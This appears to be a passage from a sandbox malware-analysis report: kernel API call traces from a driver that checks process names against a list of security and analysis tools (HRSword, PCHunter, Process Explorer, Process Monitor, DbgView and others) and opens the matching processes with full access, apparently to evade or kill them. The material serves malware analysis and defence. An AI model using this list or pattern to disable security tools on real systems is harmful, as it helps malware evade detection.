| RtlFreeAnsiString | AnsiString = SYSTEMAIDBOX |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = HRSword, SourceString = HRSword, DestinationString_out = HRSWORD |
| strstr | _Str = DLLHOST.EXE, _SubStr = HRSWORD |
| RtlFreeAnsiString | AnsiString = HRSWORD |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = hrkill, SourceString = hrkill, DestinationString_out = HRKILL |
| strstr | _Str = DLLHOST.EXE, _SubStr = HRKILL |
| RtlFreeAnsiString | AnsiString = HRKILL |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xb, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = sysfixkill, SourceString = sysfixkill, DestinationString_out = SYSFIXKILL |
| strstr | _Str = DLLHOST.EXE, _SubStr = SYSFIXKILL |
| RtlFreeAnsiString | AnsiString = SYSFIXKILL |
| ZwOpenProcess | DesiredAccess_unk = 0x1fffff, ObjectAttributes_ptr = 0xffffd0002a34e510, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName_ptr = 0x0, ObjectAttributes_deref_Attributes = 0x0, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ClientId_ptr = 0xffffd0002a34e4f0, ClientId_deref_UniqueProcess_unk = 0x1014, ClientId_deref_UniqueThread_unk = 0x0, ProcessHandle_ptr_out = 0xffffd0002a34e4d0, ProcessHandle_out = 0xbc0, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xbc0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002a34e568, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xbc0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002a34e568, ret_val_out = 0x0 |
| ZwOpenFile | DesiredAccess_unk = 0x80000000, ObjectAttributes_ptr = 0xffffd0002a34e510, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \Device\HarddiskVolume1\Windows\System32\dllhost.exe, ObjectAttributes_deref_Attributes = 0x200, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, ShareAccess = 0x3, OpenOptions = 0x0, FileHandle_ptr_out = 0xffffd0002a34e4d8, FileHandle_out = 0xffffffff80000bf4, IoStatusBlock_unk_out = 0xffffd0002a34e500, ret_val_out = 0x0 |
| ObReferenceObjectByHandle | Handle_unk = 0xffffffff80000bf4, DesiredAccess_unk = 0x10000000, ObjectType_unk = 0xffffe0003a468dc0, AccessMode_unk = 0x0, Object_ptr_out = 0xffffd0002a34e578, Object_out = 0xffffe0003b67df20, HandleInformation_unk_out = 0x0, ret_val_out = 0x0 |
| IoVolumeDeviceToDosName | VolumeDeviceObject_ptr = 0xffffe0003b695780, DosName_out = C:, ret_val_out = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x86, ret_val_ptr_out = 0xffffe0003af95ec0 |
| RtlAppendUnicodeStringToString | Destination = \??\, Source = C:, Destination_out = \??\C:, ret_val_out = 0x0 |
| RtlAppendUnicodeStringToString | Destination = \??\C:, Source = \Windows\System32\dllhost.exe, Destination_out = \??\C:\Windows\System32\dllhost.exe, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003b67df20, ret_val_ptr_out = 0x8000 |
| ZwClose | Handle_unk = 0xffffffff80000bf4, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xbc0, ret_val_out = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8e, ret_val_ptr_out = 0xffffe0003a763d70 |
| RtlInitUnicodeString | SourceString = \??\C:\Windows\System32\Fix, DestinationString_out = \??\C:\Windows\System32\Fix |
| ZwCreateFile | DesiredAccess_unk = 0x100001, ObjectAttributes_ptr = 0xffffd0002a34e100, ObjectAttributes_deref_Length = 0x30, ObjectAttributes_deref_RootDirectory_unk = 0x0, ObjectAttributes_deref_ObjectName = \??\C:\Windows\System32\Fix, ObjectAttributes_deref_Attributes = 0x40, ObjectAttributes_deref_SecurityDescriptor_ptr = 0x0, ObjectAttributes_deref_SecurityQualityOfService_ptr = 0x0, AllocationSize_ptr = 0x0, FileAttributes = 0x80, ShareAccess = 0x3, CreateDisposition = 0x1, CreateOptions = 0x40, EaBuffer_ptr = 0x0, EaLength = 0x0, FileHandle_ptr_out = 0xffffd0002a34e560, FileHandle_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002a34e130, ret_val_out = 0xc0000034 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763d70, Tag = 0x0 |
| RtlFreeAnsiString | AnsiString = \ |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = pchunter, SourceString = pchunter, DestinationString_out = PCHUNTER |
| strstr | _Str = DLLHOST.EXE, _SubStr = PCHUNTER |
| RtlFreeAnsiString | AnsiString = PCHUNTER |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = procexp, SourceString = procexp, DestinationString_out = PROCEXP |
| strstr | _Str = DLLHOST.EXE, _SubStr = PROCEXP |
| RtlFreeAnsiString | AnsiString = PROCEXP |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = powertool, SourceString = powertool, DestinationString_out = POWERTOOL |
| strstr | _Str = DLLHOST.EXE, _SubStr = POWERTOOL |
| RtlFreeAnsiString | AnsiString = POWERTOOL |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = process monitor, SourceString = process monitor, DestinationString_out = PROCESS MONITOR |
| strstr | _Str = DLLHOST.EXE, _SubStr = PROCESS MONITOR |
| RtlFreeAnsiString | AnsiString = PROCESS MONITOR |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = Dbgview, SourceString = Dbgview, DestinationString_out = DBGVIEW |
| strstr | _Str = DLLHOST.EXE, _SubStr = DBGVIEW |
| RtlFreeAnsiString | AnsiString = DBGVIEW |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = superkiller, SourceString = superkiller, DestinationString_out = SUPERKILLER |
| strstr | _Str = DLLHOST.EXE, _SubStr = SUPERKILLER |
| RtlFreeAnsiString | AnsiString = SUPERKILLER |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = superkillller, SourceString = superkillller, DestinationString_out = SUPERKILLLLER |
| strstr | _Str = DLLHOST.EXE, _SubStr = SUPERKILLLLER |
| RtlFreeAnsiString | AnsiString = SUPERKILLLLER |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = systemaidbox, SourceString = systemaidbox, DestinationString_out = SYSTEMAIDBOX |
| strstr | _Str = DLLHOST.EXE, _SubStr = SYSTEMAIDBOX |
| RtlFreeAnsiString | AnsiString = SYSTEMAIDBOX |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7, ret_val_ptr_out = 0xffffe0003a7664b0 |
| RtlUpperString | DestinationString = hrkill, SourceString = hrkill, DestinationString_out = HRKILL |
| strstr | _Str = DLLHOST.EXE, _SubStr = HRKILL |
| RtlFreeAnsiString | AnsiString = HRKILL |
| RtlFreeAnsiString | AnsiString = DLLHOST.EXE |
Code Block #18 (EP #178)
»
| Information | Value |
|---|---|
| Trigger | PspSystemThreadStartup+0x3f |
| Start Address | 0xfffff800fc2cbbc0 |
Execution Path #178 (length: 832, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 832 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044807f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044807f40, MemoryDescriptorList_unk_out = 0xffffe00044807f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044807f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00045a2e560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00045a2e560, MemoryDescriptorList_unk = 0xffffe00044807f40 |
| IoFreeMdl | Mdl_unk = 0xffffe00044807f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b494460 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b494460, MemoryDescriptorList_unk_out = 0xffffe0003b494460 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b494460, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00049a54560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00049a54560, MemoryDescriptorList_unk = 0xffffe0003b494460 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b494460 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c067610 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c067610, MemoryDescriptorList_unk_out = 0xffffe0003c067610 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c067610, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00028d38560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00028d38560, MemoryDescriptorList_unk = 0xffffe0003c067610 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c067610 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c067610 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c067610, MemoryDescriptorList_unk_out = 0xffffe0003c067610 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c067610, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b154560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b154560, MemoryDescriptorList_unk = 0xffffe0003c067610 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c067610 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b096970 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b096970, MemoryDescriptorList_unk_out = 0xffffe0003b096970 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b096970, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002b594560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b594560, MemoryDescriptorList_unk = 0xffffe0003b096970 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b096970 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b096970 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b096970, MemoryDescriptorList_unk_out = 0xffffe0003b096970 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b096970, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002bbc7560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bbc7560, MemoryDescriptorList_unk = 0xffffe0003b096970 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b096970 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1303b0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1303b0, MemoryDescriptorList_unk_out = 0xffffe0003c1303b0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1303b0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002be80560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002be80560, MemoryDescriptorList_unk = 0xffffe0003c1303b0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1303b0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b096970 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b096970, MemoryDescriptorList_unk_out = 0xffffe0003b096970 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b096970, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002bfd2560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002bfd2560, MemoryDescriptorList_unk = 0xffffe0003b096970 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b096970 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bcb2440 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bcb2440, MemoryDescriptorList_unk_out = 0xffffe0003bcb2440 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bcb2440, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002c8e6560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002c8e6560, MemoryDescriptorList_unk = 0xffffe0003bcb2440 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bcb2440 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c067610 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c067610, MemoryDescriptorList_unk_out = 0xffffe0003c067610 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c067610, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002d1c9560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002d1c9560, MemoryDescriptorList_unk = 0xffffe0003c067610 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c067610 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c067610 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c067610, MemoryDescriptorList_unk_out = 0xffffe0003c067610 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c067610, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002e593560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002e593560, MemoryDescriptorList_unk = 0xffffe0003c067610 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c067610 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000473fc010 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000473fc010, MemoryDescriptorList_unk_out = 0xffffe000473fc010 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000473fc010, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002ef2c560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ef2c560, MemoryDescriptorList_unk = 0xffffe000473fc010 |
| IoFreeMdl | Mdl_unk = 0xffffe000473fc010 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000461ff680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000461ff680, MemoryDescriptorList_unk_out = 0xffffe000461ff680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000461ff680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd0002f93d560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002f93d560, MemoryDescriptorList_unk = 0xffffe000461ff680 |
| IoFreeMdl | Mdl_unk = 0xffffe000461ff680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b0eebf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b0eebf0, MemoryDescriptorList_unk_out = 0xffffe0003b0eebf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b0eebf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00045ab6560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00045ab6560, MemoryDescriptorList_unk = 0xffffe0003b0eebf0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b0eebf0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000461ff680 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000461ff680, MemoryDescriptorList_unk_out = 0xffffe000461ff680 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000461ff680, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00049aed560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00049aed560, MemoryDescriptorList_unk = 0xffffe000461ff680 |
| IoFreeMdl | Mdl_unk = 0xffffe000461ff680 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9bd520 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9bd520, MemoryDescriptorList_unk_out = 0xffffe0003b9bd520 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003b9bd520, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00028a34560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00028a34560, MemoryDescriptorList_unk = 0xffffe0003b9bd520 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9bd520 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c251f40 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c251f40, MemoryDescriptorList_unk_out = 0xffffe0003c251f40 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c251f40, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029426560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029426560, MemoryDescriptorList_unk = 0xffffe0003c251f40 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c251f40 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c0f9c50 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, MemoryDescriptorList_unk_out = 0xffffe0003c0f9c50 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029a19560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029a19560, MemoryDescriptorList_unk = 0xffffe0003c0f9c50 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c0f9c50 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c0f9c50 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, MemoryDescriptorList_unk_out = 0xffffe0003c0f9c50 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c0f9c50, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029a25560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029a25560, MemoryDescriptorList_unk = 0xffffe0003c0f9c50 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c0f9c50 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd00049a9c4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2cb560, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00040932cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00040932cf0, MemoryDescriptorList_unk_out = 0xffffe00040932cf0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00040932cf0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x1d00000010, ret_val_ptr_out = 0xffffd00029a2e560 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd00029a2e560, MemoryDescriptorList_unk = 0xffffe00040932cf0 |
